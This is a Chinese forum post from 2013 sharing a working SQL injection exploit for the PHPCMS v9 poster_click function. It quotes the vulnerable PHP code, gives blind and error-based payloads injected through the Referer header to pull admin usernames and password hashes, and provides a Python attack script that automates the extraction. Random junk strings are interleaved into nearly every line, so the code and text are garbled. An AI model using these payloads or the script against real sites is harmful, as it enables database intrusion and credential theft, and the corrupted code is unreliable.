有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
$ M w9 `' G- o* d8 F
- x; B3 ~; x& j& B- o$ g问题函数\phpcms\modules\poster\index.php4 U) `- C! S" @1 r+ v
+ B2 E. N* \/ {3 @% f$ ~public function poster_click() {
& t* J/ }! N. H- V9 d( D+ @$id = isset($_GET['id']) ? intval($_GET['id']) : 0;7 L& B/ l# K" l$ V, }; {4 M
$r = $this->db->get_one(array('id'=>$id));
6 ^# k: U+ P1 f+ R; b8 yif (!is_array($r) && empty($r)) return false;
9 h* O) c# h5 a2 }1 B6 W, D& b$ip_area = pc_base::load_sys_class('ip_area');
& m( j3 }5 v; X9 ^$ip = ip(); V1 v" H7 i6 m
$area = $ip_area->get($ip);% n. A: ^0 f$ K
$username = param::get_cookie('username') ? param::get_cookie('username') : '';+ ]/ G& `: @, m0 M0 `4 z
if($id) {& d7 n5 \( @1 S' ]8 H) r
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
1 w, [! R0 t3 q6 }: U# V7 a$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));6 D4 F+ A! L7 C& }( t8 ~. Z. C
}
' ~8 F* O' S- }$ D$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
8 ]" M" l9 J& [2 e4 P+ m$setting = string2array($r['setting']);* A% K" K' ]5 t' D
if (count($setting)==1) {4 t' ^7 Z% h! {1 Z' v
$url = $setting['1']['linkurl'];1 [7 ^9 ^9 d; R& K8 X. \
} else {) Y8 l( Y. D+ _( S$ H
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
. V, }4 j7 I+ e: D} M# P# Y1 L* I% W! a) v; s- ?
header('Location: '.$url);: U2 q, y& d# Q4 Z1 o- A
}
' b4 d: O" u6 M7 a5 k K- u( }1 z( \. k. z$ i
. g0 r9 P) @" u) T. S L7 O- k7 H6 |) m. v( t
利用方式:
) g3 T& [9 Q8 |1 E; k! k- i( K! B- u, M# W1 }( r# f
1、可以采用盲注入的手法:
/ Z- B: Z1 ?5 E& }+ U& x a5 _$ E" {
" l) K' w) w* k5 c: Xreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#; x) L! c* U/ T9 B4 O% }+ U
9 n& w a9 m0 T; r! }5 Q
通过返回页面,正常与否一个个猜解密码字段。% I) ]- c* M# j7 f
6 y2 @8 a" B7 U# w
2、代码是花开写的,随手附上了:* b$ v- m/ b& v3 A
8 y0 \ }+ ^5 J3 Z$ q/ q1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#5 k" ~( i- G8 q n8 w
. e* ]! K6 |7 f
此方法是爆错注入手法,原理自查。; }) D0 L; S& |& P) M
- I& p3 E8 R" m" J5 c
4 _- R. T7 ~7 m& b/ R- G
! ]+ n+ N# T* [! \8 y
利用程序:% M- R' H. M1 H2 J/ U0 o* G
# e1 `# x5 ]' l4 H: ?7 U" j
#!/usr/bin/env python
# Y" E8 ~2 V, Yimport httplib,sys,re
" [; G9 M8 @3 ]8 R# H0 E% ?; F# [1 \; |+ C! X6 r, r( u7 N) a
def attack():
D' E( v3 v8 [0 b' Iprint “Code by Pax.Mac Team conqu3r!”; W6 F: A4 p& P* F% _
print “Welcome to our zone!!!”
2 _+ O9 z, K3 K) U3 S* T+ ?url=sys.argv[1]
' \( Q: _8 ]( N. v3 F3 f5 bpaths=sys.argv[2]
; {9 G) i; r& J4 B, n2 F3 fconn = httplib.HTTPConnection(url)
: B: _9 w' [+ X: a+ I: ii_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,) y9 {; |: V4 ^7 i. S. G
“Accept”: “text/plain”,
3 r$ o" c/ H( f3 u" |& S“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}" z. k; i8 R2 h6 V4 A
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)# y) C! }; `6 x
r1 = conn.getresponse()
! p" i$ F& F" F1 X7 Q& d& ydatas=r1.read()
) }$ ^7 s9 ^; A) k5 Wdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
5 _! Y* _1 \5 X: @print datas[0]: B9 t5 m# L$ x! y- }' R
conn.close()4 e1 T% G0 Z8 R5 x4 a8 {
if __name__==”__main__”:- R7 x9 o1 N) W5 m
if len(sys.argv)<3:$ U( ^9 b# n' A# k* i: c7 L, a
print “Code by Pax.Mac Team conqu3r”
! t" l2 [# ]. S% j1 H8 ?( L. t& Rprint “Usgae:”! {, n. G1 z$ m* R, [6 x- {7 B
print “ phpcmsattack.py www.paxmac.org /”7 ^- C Q' P: p. p" z
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
) i1 u' b; e, \+ N2 W& _7 K% \% Psys.exit(1). X. I8 l* M' J' n$ u, l& @
attack()
B! E* O$ v u2 v) h i
2 X* C# ] Z$ W0 _' B: ~3 `$ S* n |
发表于 2013-1-11 21:01:00
收藏
支持
反对